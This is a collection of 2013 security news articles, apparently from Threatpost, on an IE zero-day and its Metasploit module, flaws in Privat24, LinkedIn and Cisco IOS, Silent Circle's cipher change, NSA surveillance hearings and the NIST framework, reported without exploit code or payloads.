It’s been 14 days since Microsoft issued an advisory and temporary mitigation for a zero-day vulnerability in Internet Explorer, one being actively exploited in the wild and called by some experts as severe a browser bug as you can have.
Yet users have since had little more to shield them from these active attacks than a Fix It tool released by Microsoft on Sept. 17. In the meantime, exploits have already taken down a number of Japanese media sites in a watering hole attack targeting government agencies and manufacturers in Japan, and have been implicated in other attacks in Asia going back further than first thought. Microsoft has yet to issue an out-of-band patch for the bug, and with Patch Tuesday a week away, it’s increasingly likely users will continue to be exposed for at least another seven days.
That approach has worked to date because known attacks have been relatively targeted and on a small scale. Yesterday, however, things may have been accelerated with the release of a Metasploit exploit module for CVE-2013-3893. If you’re a believer in HD Moore’s Law, a theory proposed by Josh Corman of Akamai that mirrors Moore’s Law of computing in that casual attacker power grows at the rate of Metasploit, then one could expect an uptick in attacks using this IE bug.
Microsoft did not respond to a request for comment, but last week in response to the attacks against the Japanese media sites, Microsoft said it was continuing to work on developing and testing a security update and urged customers to install the Fix It.
Metasploit engineer Wei Chen wrote in a blogpost that while the exploit currently being seen in the wild targets IE 8 on Windows XP and IE 9 on Windows 7, the vulnerability is found in IE all the way back to IE 6 and the Metasploit module could be tweaked for a broader swath of targets.
According to Chen, the IE8 on XP version of the exploit targets only English, Chinese, Japanese and Korean users, unlike the Windows 7 targets.
“Instead, the exploit would try against any Windows 7 machines (IE8/IE9) as long as Office 2007 or Office 2010 is installed,” he said. “This is because the Microsoft Office Help Data Services Module (hxds.dll) can be loaded in IE, and is required to leverage Return-Oriented Programming in order to bypass DEP and ASLR, and gain arbitrary code execution.”
FireEye said infected computers connect to a command and control server in South Korea over port 443; the callback traffic is unencrypted, despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address. FireEye said it also discovered a handful of malicious domains also pointing to the IP in South Korea, which allowed them to make the connection to an attack against security company Bit9 this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.
Privat24, the mobile banking application for Ukraine’s largest commercial bank, contains an insufficient validation vulnerability in its iOS, Android, and Windows phone apps that could give an attacker the ability to steal money from user accounts after bypassing its two-factor authentication protection.
The process validation issue arises from a problem in the way PrivatBank has configured the server that handles all of its mobile banking clients. On his website and on the Full Disclosure mailing list, security researcher Eugene Dokukin explains that this vulnerability allowed him to bypass Privat24′s one-time password (OTP) mechanism. However, Dokukin needed to string in a second attack in order to compromise the banking application completely.
Ideally, Private24 should send an OTP to users via standard messaging service each time he or she logs in. However, in reality, the bank is only sending this code to users when they initially install the application on their Android, iOS, or Windows mobile device. Once the application is installed and verified with the initial OTP to a particular device, users can access the application without overcoming that barrier of entry again. For the PrivatBank website on the other hand, the bank sends a new OTP each time a user attempts to log in.
PrivatBank protects its users’ accounts with their mobile number – as a username or account number – and a password. So users would need their password to log in with or without the OTP. Dokukin’s attack therefore is a tricky one. An attacker would need a second attack, perhaps using malware or some sort of phishing scheme, to ascertain a user’s account password before being able to compromise the application and potentially steal money.
Dokukin said he contacted PrivatBank and reported the vulnerability to them. They confirmed the problem to Dokukin but have yet to fix it. The researcher has not yet released all of the technical details explaining how this attack works, but says he intends to do so once PrivatBank updates their applications with a patch fixing the bug.
Threatpost reached out to PrivatBank as well, but the company did not respond to a request for comment at the time of publication.
There’s been no shortage of discussion and debate in recent week about the possibility that the NSA has intentionally weakened some cryptographic algorithms and cipher suites in order to give it an advantage in its intelligence-gathering operations. If you subscribe to the worst-case scenario line of thinking, then most of the commonly used ciphers are compromised. If you’re more optimistic, then you tend to think that maybe the NSA has some private capabilities against encryption protocols and is exploiting them. However, Jon Callas, co-founder of Silent Circle, which announced Monday that it was moving away from potentially compromised ciphers, said that it really doesn’t matter whether the NSA has done this, because the damage has been done.
“This issue that we’re dealing with now is, can we trust any of this?” Callas said in an interview. “It really boils down to, they’ve said they’ve tried to break things, so have they done that or not? If you’re going to look at it from a realistic point of view, it really doesn’t matter whether they did it. It’s as much about the NSA undermining confidence.”
Silent Circle, a provider of secure messaging systems, made the decision to replace AES and SHA-2 in its products with Twofish and Skein, respectively. AES and SHA-2 both were part of competitions sponsored by the National Institute of Standards and Technology and recent revelations have shown that the NSA may have exerted some influence on the NIST standards process in some cases. It’s not known which protocols may have been affected, and that uncertainty is part of what drove Silent Circle’s decision, as well as the debate in the security community about what actions to take, if any.
Callas, a cryptographer and former founder of PGP Corp., said that Silent Circle had been thinking about this move for a few weeks before the announcement and that the technical implementation would not be difficult. For companies such as Silent Circle, whose customers depend on the security and confidentiality of the products, the issue comes down to removing doubt from its customers’ minds. But for the rest of the Internet community, there are other issues to consider as it relates to the security of some of the elliptic curves designed by NIST and the NSA.
“The thing that would be the most likely, and in some ways the scariest, is what if, in good faith, the NSA created these curves in good faith and then the mathematicians there found issues with them they’re weaker than anybody thought,” Callas said. “There are things that we’ve discovered about elliptic curves in the past. If the NSA knew that these curves were weaker that we thought, does it matter?
“The defense we’ve always had in the past is that the crypto the NSA recommended was the same stuff they used to protect top secret data, so we could always say, Well, would they shoot themselves in the foot, too? Now, it seems perfectly plausible to me that if the intel side of the house found something that gave them an advantage over everybody else, they would keep it from the other side of the house. Now we’re really wondering if maybe they would shoot themselves in the foot on purpose.”
The ciphers that Silent Circle is planning to use in its products going forward both were designed independently, something that Callas believes will be important for the company’s customers going forward.
“There have always been people who haven’t trusted the standard things, and even the NIST people have would say, if you don’t trust it, go use these other finalists over here that are intellectual property free,” he said. “That got me thinking. We have to find our way through the legitimate mistrust that starts to resemble a hall of mirrors in a bad 1960s spy movie.”
Image from Flickr photos of HarshLight.
Debian developers alerted Linux users late last week of a new Linux kernel build, linux-2.6, that fixes 11 separate vulnerabilities that could open the kernel to a denial of service attack, information leak or privilege escalation.
Dann Frazier, an administrator with Debian announced the security updates via the company’s listserv late Friday.
The first two Common Vulnerabilities and Exposures identifiers fix information leaks in the kernel that could be exploited via a 64-bit system (CVE-2013-2141) and while it may sound archaic, a CD-ROM driver (CVE-2013-2164). According to Jonathan Salwan, a Paris-based Linux researcher, under certain conditions a local user on a system with a malfunctioning CD-ROM drive could gain access to sensitive kernel memory.
Salwan also discovered an additional vulnerability, in the openvz kernel, that local users could exploit to gain access to sensitive kernel memory.
Kees Cook, a member of the Ubuntu security team, discovered four of the 11 vulnerabilities. Two of those can lead to an attacker crashing the system via DoS (CVE-2013-2888 and 2892) while the other two are somewhat less serious and affect the block subsystem and the b43 network driver. Those vulnerabilities should really only be of concern to those with specially configured systems.
The remaining fixes address a variety of issues, including memory leaks in the implementation of the PF_KEYv2 socket family and the Linux SCTP protocol.
Per usual Debian, which runs one of the more popular Linux distributions today, is encouraging users to upgrade to linux-2.6 and any associated user-mode-linux packages.
Those looking for more information on the vulnerabilities can head to Debian’s security update, DSA-2766-1, from Friday.
Microsoft’s report on compliance with law enforcement requests for data demonstrates a status quo for the software giant from the last reporting period. While the number of requests from law enforcement dropped worldwide in the first six months of 2013, Microsoft complied with 79 percent of requests resulting from court orders, subpoenas and warrants. Only 2.2 percent of those requests resulted in the customer content from services such as Outlook, Hotmail, Xbox Live, or SkyDrive being turned over to the authorities; no Skype requests for user content were made.
Microsoft’s numbers in this report do not take into account national security requests for data; those are handled in a separate report and remain a contentious subject for technology companies. A slew of them, including Microsoft, Google, Facebook, Yahoo and most recently LinkedIn and Dropbox, have petitioned the Foreign Intelligence Surveillance Court (FISC) for permission to publish aggregate numbers on National Security Letter requests for customer data.
In the meantime, Microsoft’s Law Enforcement Requests Report shows that the majority of requests come from authorities in the U.S., United Kingdom, Turkey, Germany and France; Skype-related requests are largely concentrated from the U.S., U.K., France and Germany. Microsoft said that no Skype content data was turned over to law enforcement among the 81 percent of Skype requests complied with.
“This new data shows that across our services only a tiny fraction of accounts, less that 0.01 percent are ever affected by law enforcement requests for customer data,” the report said. “Of the small number that were affected, the overwhelming majority involved the disclosure of non-content data.”
Non-content data, according to the report, includes the user’s name, billing address, IP address history and more. Content data, on the other hand, is defined as the text of an email message, images and files stored in SkyDrive files, calendar information and contact information.
Encompassing all Microsoft services, including Skype, the company received 7,014 law enforcement requests affecting 18,809 accounts; 11 percent of those requests resulted in user content being turned over and 65 percent of non-content data requests were complied with. Of the requests Microsoft did not comply with, either a legal burden was not met, or no customer data was found for the account in question.
As for Skype data alone, 759 requests were made on 1,564 accounts. No content requests were made in relation to Skype, while 790 requests for non-content data were complied with; 80 percent of the requests.
Skype, which was acquired in 2011 by Microsoft, has been a centerpiece of the NSA surveillance scandal since it became public in June. Almost immediately, data leaked by former NSA whistleblower Edward Snowden indicated that not only did the spy agency have pre-encryption access to Outlook and Hotmail data, but it had also collaborated with Microsoft on access to SkyDrive and Skype. According to a report in the Guardian, the NSA boasted of having been able to triple the number of Skype video calls captured in the Prism program.
Microsoft has denied these accusations and along with other massive tech companies has petitioned the FISA court for the ability to enhance its reporting on requests from the government related to national security. To date, companies are allowed to publish NSL request data in bundles of 1,000; Microsoft reported 0-999 for 2012 and between 1,000 and 1,999 the year before.
Smaller companies such as LinkedIn and Dropbox argue that level of reporting decreases transparency and could indicate that those companies could be bigger national security targets for data requests than they are.
The state of embedded device security is poor, and there hasn’t been much in the way of discussion to the contrary. It’s well established that vendors skimp on security, selling for example, routers and other networking gear protected only by default passwords, or other critical devices engineered to be accessible with a simple telnet command. These actions pose an enormous risk to the infrastructure supporting those devices, leaving them open to attack by hackers. Those vulnerabilities can lead to data loss, network performance degradation, or worse put lives in danger if critical services such as water or power are impacted.
For Metasploit creator HD Moore, this was a call to action. Moore has invested serious time into examining data from previous scans of the IPv4 address space looking for equipment exposed by shoddy default configurations and other vulnerabilities. His own Critical.io project, along with the Internet Census 2012, the Carna botnet and a host of academic and research tools that scan the Internet and return bulk data on device exposures has done plenty to shine a harsh light on the risks these Web-facing devices.
But Moore believes there is plenty of room for additional analysis. He’s advanced his work by collaborating with a team of researchers at the University of Michigan on Project Sonar, a repository of scan data that has been responsibly collected by the researcher community. Moore said he hopes to engage the security community into not only analyzing the data produced by scans of public-facing networks, but also contributing data sets. Project Sonar is being hosted by the University of Michigan at scans.io.
“We need more eyes on it because we need the shame to fall on these vendors for the terrible products they’re producing,” Moore said, adding as an example, that he’s found upwards of 10,000 command shells sitting online accessible via telnet that would give an outsider root access to the device in question. “The fact that we’ve got issues like that where there’s not even a pretense of security, yet these devices are not getting any better and in some cases we’re seeing an expansion of the vulnerable devices year over year, that was a call to action to me to make it harder for vendors to avoid the scrutiny they deserve.
“The thing is a lot of people like to see results and like to see the tiny pictures but not many people want to dig into and pull stuff out,” Moore said. “We’re going to try to do that make it palatable for amateur researchers and every day IT admins to use as a resource.”
Currently, there are five data sets hosted by Project Sonar, formally known as the Internet-Wide Scan Data Repository; the two teams used a host of tools to collect the data including ZMap, an Internet scanner developed at UM, UDPBlast, Nmap, and MASSCAN among others. Two datasets were contributed by the University of Michigan and those include scans of HTTPS traffic looking for raw X.509 certificates (43 million have been included from 108 million hosts) as well as data from an IPv4 scan on port 443 conducted last October to measure the impact of Hurricane Sandy. Rapid7 has also contributed three data sets: service fingerprints from Moore’s Critical.IO project; a scan of IPv4 SSL services on port 443; and a regular DNS lookup for all IPv4 PTR records.
“After going through the data enough times, it became obvious there are so many different vulnerabilities and issues that really just take some human eyes on things,” Moore said. “It really doesn’t make sense to sit on this amount of data and not share it.”
Researchers and IT managers can use the data in a variety of ways; in bulk, researchers could generate vulnerability data per vendor or per product, or on a narrower scope, the data can be used to do asset inventory, for example, on a particular IP range in order identify existing vulnerabilities. A Rapid7 team used the data, for example, to accelerate a penetration test on an 80,000-node network. Moore said an entire asset inventory was done in about 20 minutes as opposed to three days with customary tools and scans.
Early feedback has been positive, and Moore said some researchers have already begun to build Web services and queries around the data. Moore added that UM and Rapid7 hope that additional datasets will eventually be contributed, so long as they collection efforts are done legally and within ethical bounds. It’s for that reason, Moore said, that neither UM nor Rapid7 will host data collected from the Internet Census or Carna botnet for this project, the legality of which is still in question.
“Right now we’re steering away from offering any kind of Web service; I don’t want to have a service where folks are depending on me to get them results, nor do I want to be responsible for seeing what queries they run,” Moore said. “It’s not what we’re trying to solve. We’re taking the bulk data that’s multiple gigabytes, 5-6 terabytes, and make that available on the website in bulk form for anyone who’s doing research to download it. At the same time, we’re taking different slices of the data as well and saying ‘Let’s just take the name fields for this packet,’ or parse out a particular field and make those available for folks who are doing more casual testing.”
I had a chance to visit a number of industrial events this year and can see the evolution of cybersecurity in the industrial field. One of these was the 4th National Institute of Standards and Technology’s (NIST) Cybersecurity Framework Workshop (CFW). Kaspersky was in attendance at the previous events, but the main difference with this one, was that now we had sponsors.
The 4th Workshop was another round to gather feedback on the latest version of the cybersecurity framework published on August 28, 2013. My takeaways from this workshop include (well, not too far from the previous 3rd workshop):
- The Cybersecurity Framework is not about “how,” it’s about “what”
- The CFW is more of a marketing push for newbies and a refresher for pros
- There is a huge demand for industrial people to decide on how.
- Whitelisting and Default Deny are a must
Overall, the resulting framework is not specific enough for any of the Government-specified 17 Critical Infrastructure Sectors, to understand the practical steps of implementing a cybersecurity strategy or to at least understand the practical set of instruments (aka security controls).
For those who are not familiar, the Framework consists of five functions, categories for each of those functions, subcategories for each category; and separately, security profiles and maturity tiers.
Functions describe in general, what your cybersecurity should consist of: Identify, Prevent, Detect, Respond and Recover. Most people agree on these functions, while some argue that Improve/Update should be explicitly added in the security domain. As opposed to many other frameworks, security is becoming more obsolete, because while you may be secure today, in 12 months that could no longer be the situation because of new attack methods.
The Categories included in the Framework are comprehensive as well. But, unfortunately, the subcategories (please find the full list in the document itself, see page 14) are a mix between abstract categories which helps to see the domain and potential goals, but leaves the selection of methods to the reader, and technical security controls that many sectors find inapplicable or incomplete. So it’s unsurprising that for the second Workshop in a row we see the same story: whenever any of the workgroup starts speaking about subcategories the work stalls. Most of the participants failed to examine the entire list, besides representatives of different sectors are unsatisfied with the way subcategories are set at all – for their own reasons.
Overall, the subcategories decided upon can be considered quite a failure. For example, the only control related to Industrial Control Systems simply says, “PR.PT-5: Manage risk to specialized systems, including operational technology (e.g., ICS, SCADA, DCS, and PLC) consistent with risk analysis”. It’s very specific, and helpful for OT people, if you know what I mean.
Apparently, it’s rather hard to have “Security Controls” done in a universal way for different sectors – including IT and industrial systems and this doesn’t even take into account smaller sectors. For example, financial sectors normally are believed to take care of data quite well, but the example of Treasury was quite illustrative – all data is public, so confidentiality isn’t a major concern, but transaction and data integrity of shares in peoples’ possession, is a must. This is similar to the situation for industrial controls systems.
My impression is that NIST has decided to leave the work on defining the exact set of subcategories and controls to individual critical infrastructure sectors.
However, this method is not good for certain sectors depending on the industrial network, as there are 9 sectors where industrial systems prevail, but regulators and industry associations are different – DoE, DoT. So it is unclear whether each sector has to do the “instantiation” of the framework on their own, and whether or not this should be repeated nine times with different results, as they share much of commonalities due to their reliance on Industrial Control Systems.
Also, NIST will leave the Framework implementation details to each sector. One of the questions that’s wasn’t answered at the workshop was, “How do you implement security along this framework, or at least, what will you start with?”
One option is to remove subcategories from the framework, to make it consistent, and to try not to present universal security controls, but rather make the Categories a goal-setting framework.
The Framework also includes another dimension – Profiles (what does your organization need among the variety of categories and controls – what are your security priorities, based on the business specifics), and Tiers (how mature are you in cybersecurity). While it seems to be common sense, all of the frameworks in different domains basically share the same approach on “Flexibility” and “Maturity”. However in practice, in CFW it’s rather a mess because it is unclear how to measure what Tier you have and in turn what that tier stands for.
So what’s the good news?
- NIST adopted Kaspersky Lab’s whitelisting (Default Deny) approach for security for Critical Infrastructures – namely, “PR.PT-3: Implement and maintain technology that enforces policies to employ a deny-all, permit-by-exception policy to allow the execution of authorized software programs on organizational systems (aka whitelisting of applications and network traffic)”. We believe that this totally makes sense, and we are happy to know that our voice has been heard and our vision shared.
- A major goal and major impact of the Cyber Security Framework is marketing – pushing all Critical Infrastructures, including many of those who do not yet have any cyber security programs, to start doing something, and providing more of a budget to CISOs of those who have a clear vision already. Many people suggested putting a framework in a marketing brochure to make it clear.
- The third positive as a result of this workshop, is that once pushed widely, the Framework can help people from different companies. Helping companies better understand each other in the cybersecurity domain is important, as most critical infrastructures are interconnected and outsourcing to each other, which can bring a serious domino effect in a potential cyber security incident. Cybersecurity marketing efforts could be helpful in many countries for the sake of cybersecurity of Critical Infrastructures.
- Fourth, sector-specific jobs on specifying the security controls and mapping the Framework to existing sector and industry standards will be done, though that person or group has not been identified. The cyberframework could become a cross-reference between different sector’s standards and frameworks, which will also help build better understanding between entities on the technical level.
While the Cybersecurity Framework may serve as the first step in pushing Critical Infrastructure security, the only way to actually increase protection is to make sure it goes with step two (where do I start?) and step three (what are the best practices to follow?) for each of the Critical Infrastructure sectors. Among these sectors, there are 10 industrial-centric ones that are less-experienced in IT security overall and have a different nature to their processes (high-availability instead of high-confidentiality).
So, the question still remains –how can we make industrial security more practical for the current threat landscape?
Kaspersky Lab is actively exploring possible options with our industrial partners.
The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering, as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA’s influence on NIST’s development of ciphers in the last couple of decades.
Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it’s in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein.
“At Silent Circle, we’ve been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision.
Twofish is a cipher suite written by Bruce Schneier and it was one of the finalists during the AES competition, but lost out to the Rijndael algorithm. It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle’s products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalists in the recently completed SHA-3 competition.
“We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I’m a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said.
The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA‘s influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government and many of those standards are adopted by other organizations, specifically crypto standards. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual EC_DRBG random number generator developed under its supervision.
“The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said.
Silent Circle’s move away from AES and SHA-2 shouldn’t be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them.
“This doesn’t mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn’t mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA’s perfidy, along with the rest of the free world. For us, the spell is broken. We’re just moving on. No kiss, no tears, no farewell souvenirs,” he said.
Image from Flickr photos of Marcin Wichary.
Mike Mimoso and Dennis Fisher look back at the news of the last couple of weeks, including some new NSA PR efforts and the Icefog cyberespionage campaign.http://threatpost.com/files/2013/09/digital_underground_127.mp3
When things go badly in Washington, D.C., when a scandal breaks or damaging leaks begin to surface, there is an established and well-worn playbook that politicians and executives can turn to for solace. There’s a page for every conceivable situation, and it’s that playbook that the National Security Agency and its director, Gen. Keith Alexander, are relying on now as they struggle to win back a bit of the public and political support they’ve lost and keep their tenuous grasp on the collection tools they’ve been employing for more than a decade.
Alexander, who is not just the director of NSA and commander of U.S. Cyber Command but the public face of the agency and its recent troubles, has been making the rounds in the last few days, speaking at security conferences and appearing before Congressional committees. And the message he is delivering is the same in each case: the NSA does not spy on Americans and is, in fact, one of the main reasons that there haven’t been any major terror attacks since 9/11. The agency, he said, looked at the intelligence community’s failures in the months leading up to 9/11 and knew that it needed better tools and more visibility into electronic communications in order to “connect the dots”.
Hence, Section 702 of the USA PATRIOT Act and Section 215 metadata collection. Those tools, Alexander said, are vital to preventing future terror attacks.
“What we were blamed for as an intelligence community is not connecting the dots. So we came up with a couple of programs. FISA is the key to connecting the dots,” Alexander said in a speech at the Billington Cybersecurity Summit on Wednesday.
He repeated much the same sentiments Thursday in a hearing of the Senate Intelligence Committee, defending the use of FISA Section 215 data collection and repeating, as he has many times since the Edward Snowden leaks began, that the program has helped prevent several terror attacks.
By shifting the focus away from the NSA’s potential abuses of the surveillance programs the question of whether the bulk collection of phone and Internet data is even necessary, Alexander is employing the time-honored strategy of answering the question he wanted to be asked rather than the one that was posed. He is changing the narrative.
No one disputes that the NSA, CIA, FBI and other agencies are working hard to defend the country and disrupt terrorism. That’s their job, and they’re good at it. Those agencies need tools to do the job, but the thing about tools is that each one is designed for a specific purpose. Start using one for a different job, and it’s not as effective, or worse, someone gets hurt. The old saying is that when all you have is a hammer, everything looks like a nail. That bit of wisdom isn’t limited to hand tools.
The tools that Congress has given the NSA–metadata collection and large-scale Internet traffic collection among them–are meant to do one thing and that’s identify potential terrorist and criminal plots. Alexander and others have said that these programs have been highly effective at doing that. And perhaps they have; the public will never know that. Much like security, intelligence work has the built-in disadvantage of people only finding out about your failures and not your successes. But that’s not really the point, is it? Hammers are great for driving nails, but they can be used to break windows, too.
Some members of Congress have heard the reasoning from Alexander and others for years and have resisted their efforts to change the narrative.
“You built an intelligence collection system that deceived the American people repeatedly. Time after time, the American people were told one thing about domestic surveillance in public forums while government agencies did something else,” Sen. Ron Wyden of Oregon said during the Intelligence Committee hearing yesterday. “That’s a loss of trust that cannot be rebuilt.”
For most of its history, the NSA hasn’t had to worry about what the public thinks. It has answered only to Congress and the president. That’s all changed now, something that Alexander knows quite well. So he has turned his sights on the media and the lawmakers who are asking pointed questions in an effort to move the spotlight away from his agency. But the spotlight is widening with each new revelation and the room for maneuvering is shrinking with each passing day.
The professional social networking service LinkedIn was susceptible to four reflected cross site scripting (XSS) vulnerabilities, before issuing a fix for those flaws over the summer.
XSS vulnerabilities are among the most prevalent bugs online. In this case an attacker could potentially exploit LinkedIn users by injecting HTML or script code into a their browser in order to steal the user’s cookies, according to a posting on the Full Disclosure mailing list.
After successfully exploiting the issue, an attacker could then send phishing emails drawing unsuspecting users to a clone site to infect victim’s machine with malware, or steal that user’s login credentials.
The first vulnerability is exploitable by writing maliciously crafted HTML into the “Share an update…” field on the LinkedIn home page. The second and third XSS bug can be similarly executed by visiting the “Groups you may be interested in” section of the “Groups” page. Once there, an attacker would need to find an open group and begin a discussion by inserting more specially crafted code into the field on that page before sharing the discussion. The final vulnerability exists on the “group” page as well. However, this one is exploitable by creating a group, then creating a poll within that group and inserting malicious code into the poll creation field.
Eduardo Garcia Melia of ISecAuditors uncovered the flaws in December 2012. According to Full Disclosure, LinkedIn fixed the problems sometime in July 2013, and Melia submitted the vulnerability report to Full Disclosure yesterday.
Threatpost reached out to LinkedIn to confirm that the company’s security team had indeed resolved the vulnerabilities but they were not readily available for comment at the time of publication.
LinkedIn touts itself as the world’s largest professional network, boasting more than 238 million users globally.
The professional network made a splash earlier this month with an appeal to the Foreign Intelligence Surveillance Court, the secretive court responsible for regulating much of the National Security Agency’s spying efforts, asking that it be permitted to publish data on the number of National Security Letters it receives.
Did we hear the next shoe to drop in the NSA surveillance saga?
Yesterday before a hearing of the Senate Intelligence Committee, Sen. Ron Wyden, D-Oregon, asked some pointed questions of NSA director Gen. Keith Alexander regarding whether the agency collects cell tower location data in addition to metadata from cell phone calls. That information, used by law enforcement in investigations with a warrant, would help the U.S. spy agency pinpoint the physical location of subjects of investigations.
Alexander moved around what sounded like a rhetorical question from the senator, with a stock answer that a Foreign Intelligence Surveillance Court order would be required if the government wished to seek cell site information as part of the bulk collection of cellphone records.
“What I don’t want to do is put out in unclassified form anything that’s classified,” Alexander said.
With the promise of additional leaks coming from the cache of documents stolen by former NSA contractor Edward Snowden, was Sen. Wyden trying to head the next disclosure off at the pass?
Wyden was animated in grilling Alexander yesterday. He prefaced his questions about the collection of cell site data with a monologue scolding the NSA and the intelligence community for not being up front about surveillance from the outset.
“You built an intelligence collection system that deceived the American people repeatedly. Time after time, the American people were told one thing about domestic surveillance in public forums while government agencies did something else,” Wyden said. “That’s a loss of trust that cannot be rebuilt.”
The Senate Intelligence Committee has oversight over federal intelligence activities, and a good number of the members lobbied to maintain the NSA’s ability to keep surveillance activities alive in the name of national security and foiling terrorist activities. While the arguments for and against stayed true to party lines for the most part, it was mostly friendly fire for Alexander and Director of National Intelligence James Clapper.
Sen. Dan Coats, R-Indiana, admonished the media for how it’s reported the scandal, calling it “disturbing” that the despite the declassified information provided in public forums, analysis by the media has not always been accurate, in his opinion.
“We’ve been frustrated on countering the popular narrative,” Clapper said. “We’ve done some risk management by opening as much as we can, recognizing the importance for transparency and the importance of regaining the trust of the American people.”
That transparency, Clapper said, also benefits America’s adversaries.
“They go to school on that too,” Clapper said. “Fundamentally, if we don’t have the trust and confidence of the American people, then all of that is for naught. We have tried to err on the side of transparency and openness, but there are risks here.”
Alexander, who spoke earlier this week at the Billington Cybersecurity Summit in Washington, invoked the September 11 attacks on a number of occasions, and reiterated that had the intelligence community not been able to collect bulk cellphone records through Section 215 of the PATRIOT Act, America would have suffered additional terrorist attacks since.
“The American people don’t have a forum where we can have a classified discussion. We can’t reveal information we have,” Alexander said. “We have a process set up to bring information to Congress and the courts and share that with the FBI and go after bad people who intend to do us harm. I’d much rather sit here today defend what we’re doing than be here telling you why we failed to connect the dots again.”
In the meantime, Wyden and Colorado Democrat Sen. Mark Udall pushed a bill before the legislature called the Intelligence Oversight and Surveillance Reform Act, which would reform surveillance activities and prohibit bulk collection of cell data. This runs in parallel with another bill proposed by Senate Intelligence Committee chair Sen. Dianne Feinstein, D-Calif., and Sen. Saxby Chambliss, R-Ga., that would propose reforms yet preserve the NSA’s ability to collect phone records on foreign targets and Americans.
“There is growing, bipartisan sentiment in Colorado and across the country that the way the NSA and our intelligence agencies are balancing Americans’ privacy rights and our security is fundamentally out of whack. We need to end the NSA’s collection of millions of innocent Americans’ private phone records and focus on the real problem: terrorists and spies,” Udall said in a press release announcing the bill. ”These aren’t vague or abstract threats to our liberty. These dragnet searches are happening right now. I am proud to lead this bipartisan push to protect Americans’ privacy rights and ensure that our pursuit of security does not trample our constitutional liberties.”
Wyden’s bill would create an independent advocate who would argue against the government in the secret Foreign Intelligence Surveillance Court; the government is generally the only one arguing before the court, Wyden’s bill says. The act would also prohibit the intelligence community from conducting warrantless searches for cell and email data on Americans.
Feinstein, meanwhile, said domestic collection of metadata does not equal surveillance and argued the NSA’s activities were lawful. Her bill is an attempt to enhance public perception of the NSA’s program. Her bill would require the NSA to publicly report how often it access its database of call metadata and shorten how long that data is stored. Feinstein said her bill would also put the NSA director before the Senate for confirmation.
For the time being, the NSA’s bulk collection continues unabated and more Snowden leaks are expected. Alexander told the committee, when asked, that there is no upper limit on the number of records the NSA may collect and that the American people should trust the oversight and compliance requirements NSA agents must oblige in order to access and investigate data that’s collected.
“I believe it is in the nation’s best interests to put all phone records into a lockbox so that we can search it when needed, yes,” Alexander said.
Image courtesy Razor512 Flickr stream
Telecommunications company Cisco this week is warning customers and those running their software of eight separate vulnerabilities it has patched in its internetwork operating system (IOS) infrastructure product.
Cisco’s Product Security Incident Response Team (PSIRT) released the advisories yesterday on the Security Intelligence Operations section of its website.
More than half of the advisories deal with denial of service vulnerabilities that stem from the way the software is configured. The vulnerabilities involve the Network Time Protocol (NTP) feature, the virtual fragmentation reassembly (VFR) feature for IPv6, the network access translation (NAT) feature, the T1/E1 driver queue and the DCHP implementation of IOS. All could – under the right circumstances – allow an unauthenticated remote hacker to cause a DoS condition, either by sending maliciously crafted packets to the device or getting the device to reload without the users’ consent.
The other three vulnerabilities involve different components in the device.
One is tied to IOS’ Zone-Based Firewall (ZBFW) functionality. The ZBFW incorrectly processes some types of HTTP packets when the device is “configured for either Cisco IOS Content Filtering or HTTP application layer gateway inspection.” All a hacker would have to do is send malicious HTTP packets through a device to exploit it.
The second involves a problem in IOS’ Internet Key Exchange (IKE) feature that could lead to a memory leak and device reload. Much like the ZBFW vuln, IKE incorrectly handles malformed IKE packets. Some specially crafted IKE packets could cause the software to not release allocated memory, in turn causing a memory leak.
Lastly, a wedge vulnerability in the Resource Reservation Protocol (RSVP) feature can allow a hacker to trigger an “interface queue wedge” on the affected device that can lead to loss of connectivity, loss of routing protocol and in some cases, a DoS condition. An interface queue wedge is more or less a vulnerability where packets are received and queued by IOS but never removed from the queue, stifling the device and causing it to stop working.
While workarounds are available for three of the eight vulnerabilities, the NTP vulnerability, the wedge vulnerability and the T1/E1 vulnerability, Cisco has released free software updates that remedy all of the IOS issues.
All of the updates are available on Cisco’s Security Advisories, Responses and Notices page and those deploying the updates are being asked to review their software before patching them to make sure their current configurations will continue to be supported.
Cisco IOS is run on millions of machines globally and is essentially a collection of routers, switches and functions that rely on the company’s networking system. It’s the second time this year Cisco has released a large batch of patches for the product. The company also pushed out seven patches for the software in late March.
